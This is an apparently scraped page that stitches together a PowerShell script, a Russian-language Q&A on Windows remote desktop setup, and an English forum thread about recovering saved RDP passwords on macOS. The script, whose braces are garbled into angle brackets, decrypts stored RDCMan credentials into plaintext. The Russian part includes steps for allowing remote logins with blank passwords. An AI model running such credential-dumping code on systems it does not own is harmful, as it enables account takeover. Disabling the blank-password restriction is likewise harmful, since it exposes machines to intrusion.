    function Decrypt-RDCMan ($FilePath) < if (!$FilePath) < [xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings" $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*" $Xml | select-object -ExpandProperty "Node"| % > else < [xml]$Types = Get-Content $FilePath $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials" # depending on the RDCMan version we may need to change the XML search $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" ># depending on the RDCMan version, we may have to use search through the #text field in the XML structure $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n">> > function Decrypt-DPAPI ($EncryptedString) < # load the Security Assembly into the PS runspace Add-Type -assembly System.Security $encoding= [System.Text.Encoding]::ASCII $uencoding = [System.Text.Encoding]::UNICODE # try and decrypt the password with the CurrentUser Scope try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < echo "Could not decrypt password" >> > 

    Execute the script in Powershell ISE, that should register the functions. Then simple run:

    Decrypt-RDCMan -FilePath MyRDGfile.rdg

    answered Oct 20, 2018 at 8:03

    Нажмите клавишу Windows и введите: расширенная система. Щелкните Просмотр дополнительных настроек системы. Щелкните вкладку «Удаленный» и выберите «Разрешить удаленные подключения к этому компьютеру». Установите флажок «Проверка подлинности на уровне сети» для большей безопасности.

    В служебной программе «Управление компьютером» перейдите в «Локальные пользователи и группы»> «Пользователи», затем щелкните правой кнопкой мыши нужного пользователя удаленного рабочего стола (пользователь по умолчанию — ServerAdmin) и выберите Установить пароль…. Во всплывающем окне выберите «Продолжить» и завершите смену пароля.

    Как мне найти свои учетные данные для удаленного рабочего стола?

    Щелкните значок настроек / шестеренки в правом верхнем углу окна Jump Desktop Connect. Затем нажмите Диагностика. Ваше имя пользователя будет отображаться рядом с полем «Имя пользователя». Используйте это как имя пользователя в запросе учетных данных Windows.

    Как мне найти имя пользователя и пароль для удаленного рабочего стола?

    Удаленный рабочий стол с компьютера Linux

    Откройте свою терминальную программу. (Не забудьте использовать IP-адрес вашего сервера.) Появится запрос на вход в Windows. Войдите в систему, используя «Администратор» в качестве имени пользователя и основного пароля администратора..

    Что такое учетный пароль в удаленном рабочем столе?

    Обычно используется для хранения учетных данных Windows для ваших текущих сеансов потому что диспетчер удаленного рабочего стола не может получить к ним доступ. … Когда требуется сменить пароль, вам просто нужно изменить его один раз в «Мои личные учетные данные».

    Как мне войти в удаленный рабочий стол без пароля?

    Windows — разрешить доступ к удаленному рабочему столу с пустыми паролями

    1. Запустите gpedit.msc.
    2. Перейдите в Конфигурация компьютера> Параметры Windows> Параметры безопасности> Локальные политики> Параметры безопасности.
    3. Установить учетные записи: ограничение использования пустых паролей локальными учетными записями только для входа в консоль = отключено.

    Как подключиться к удаленному рабочему столу в Windows 10?

    На локальном ПК с Windows 10: в поле поиска на панели задач тип Подключение к удаленному рабочему столу, а затем выберите Подключение к удаленному рабочему столу. В «Подключение к удаленному рабочему столу» введите имя ПК, к которому вы хотите подключиться (из шага 1), а затем выберите «Подключиться».

    Как настроить учетные данные удаленного рабочего стола?

    Перейдите в «Пуск -> Все программы -> Стандартные -> Подключение к удаленному рабочему столу».». 2. Откроется окно, подобное приведенному ниже, где вы должны ввести адрес своего удаленного компьютера. Нажмите «Подключиться», чтобы ввести свои учетные данные.

    Как использовать учетные данные удаленного рабочего стола?

    1. Запустите клиент подключения к удаленному рабочему столу Microsoft, щелкнув Пуск> Все программы> Стандартные> Подключение к удаленному рабочему столу.
    2. Укажите имя целевого хоста или IP-адрес.
    3. Нажмите Connect.
    4. Когда будет предложено войти в систему с учетными данными общего доступа, выберите Да.

    Как изменить учетные данные удаленного рабочего стола?

    Как изменить пароль через удаленный рабочий стол

    1. Шаг 1: В меню «Пуск» окна найдите «подключение к удаленному рабочему столу» и откройте его.
    2. Шаг 2: Введите имя компьютера как «passreset1.uwb.edu» и нажмите «Подключиться».
    3. Шаг 3: Вам будет предложено ввести учетные данные, выберите «Использовать другую учетную запись».

    Как мне войти в систему как администратор на удаленном рабочем столе?

    Удаленный рабочий стол: добавление пользователя в группу администраторов (Windows 7)

    1. Откройте меню «Пуск» на рабочем столе и выберите «Панель управления».
    2. Выберите Учетные записи пользователей и выберите Учетные записи пользователей.
    3. Выберите Управление учетными записями пользователей.
    4. В окне «Учетные записи пользователей» выберите учетную запись, которую нужно изменить, и выберите «Свойства».

    Как мне войти на удаленный рабочий стол как администратор?

    Сетевое администрирование: подключение к удаленному рабочему столу

    1. Откройте Панель управления и дважды щелкните Система. На этом шаге появляется системный апплет.
    2. Щелкните вкладку Remote. Этот шаг вызывает параметры удаленного доступа.
    3. Установите один из двух флажков Разрешить подключения. Какой выбрать? …
    4. Щелкните ОК. Готово!

    Microsoft Remote Desktop password

    I made mistake- deleted fresh created password on my RDP, but I saved it in the Microsoft Remote Desktop and can login in my RDP. How can I see password in the soft? If I go to the «Preferences»then «User account» I see only only bold points and can’t see password.

    Remote Desktop
    A Microsoft app that connects remotely to computers and to virtual apps and desktops.
    4,076 questions
    Sign in to follow
    1 comment Hide comments for this question Report a concern
    I have the same question 1 vote
    Felix zhao 1 Reputation point
    2021-10-21T07:43:39.043+00:00
    Hello, I also encountered the same problem, how did you solve it in the end?
    0 votes Report a concern
    Accepted answer
    Eleven Yu (Shanghai Wicresoft Co,.Ltd.) 10,726 Reputation points • Microsoft Vendor
    2020-11-12T02:34:06.913+00:00

    Hi, Please check if you can find the pathword from below paths: /Users/$USER/Library/Containers/com.microsoft.rdc.mac/Data/Library/Preferences/com.microsoft.rdc.mac.plist
    Applications/Utilities/Keychain Access For your reference: https://apple.stackexchange.com/questions/182209/where-does-microsoft-rdp-8-for-mac-store-its-configuration/182258 Hope the information helps. Thanks,

    Eleven

    If the Answer is helpful, please click «Accept Answer» and upvote it. Thanks.
    6 comments Show comments for this answer Report a concern
    Olen Matronov 26 Reputation points
    2020-11-12T06:54:37.823+00:00

    I go to this folder, try to open by Keychain file com.microsoft.rdc.mac.plist but get error. The content of this object could not be retrieved. How can I see password?

    0 votes Report a concern
    Olen Matronov 26 Reputation points
    2020-11-12T07:01:34.147+00:00
    Huh find password. Thank you very much, you are my superhero 🙂
    0 votes Report a concern
    Eleven Yu (Shanghai Wicresoft Co,.Ltd.) 10,726 Reputation points • Microsoft Vendor
    2020-11-12T07:05:27.26+00:00
    Glad to hear the password is found finally.
    0 votes Report a concern
    Nathália Gucowski 1 Reputation point
    2021-04-09T15:01:03.683+00:00

    How did you find it? I keep getting the same error you mentioned The content of this object could not be retrieved.

    0 votes Report a concern
    Felix zhao 1 Reputation point
    2021-10-21T07:42:16.917+00:00
    Hello, I also encountered the same problem, how did you solve it in the end?
    0 votes Report a concern
    Felix zhao 1 Reputation point
    2021-10-22T07:37:13.137+00:00

    1. Use RDP login into Windows.
    2. Open cmd as Adin, and run net user .

    It’s work for me.

    0 votes Report a concern
    Show 1 more comment

    1 additional answer

    Sort by: Most helpful
    Most helpful Newest Oldest
    Deepak Rao 21 Reputation points
    2021-12-15T13:51:58.873+00:00

    This is what worked for me. I’m on MacOS Mojave (10.14) Let’s say the user account stored in Microsoft Remote Desktop is «sleepycat» and you want to know the password. Open Keychain Access -> Click «Login» from Keychains (other options would be iCloud, System and System Roots). Under Category select «All Items» or «Passwords»
    On the right pane, search for «sleepycat». Right click -> Copy Password to Clipboard (It may prompt you for your mac credentials)
    Paste the copied password on to a text editor to see the password. Hope this helps.

    1 comment Show comments for this answer Report a concern
    Mark, Andrew 1 Reputation point
    2023-01-03T19:53:53.913+00:00

    Or, instead of copying & pasting, you can also right-click the password entry and click «Get Info». On the following dialog, click the «Show password» box and enter your keychain credentials. Then, the password will be revealed. Thank you for this post, it was very helpful.

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *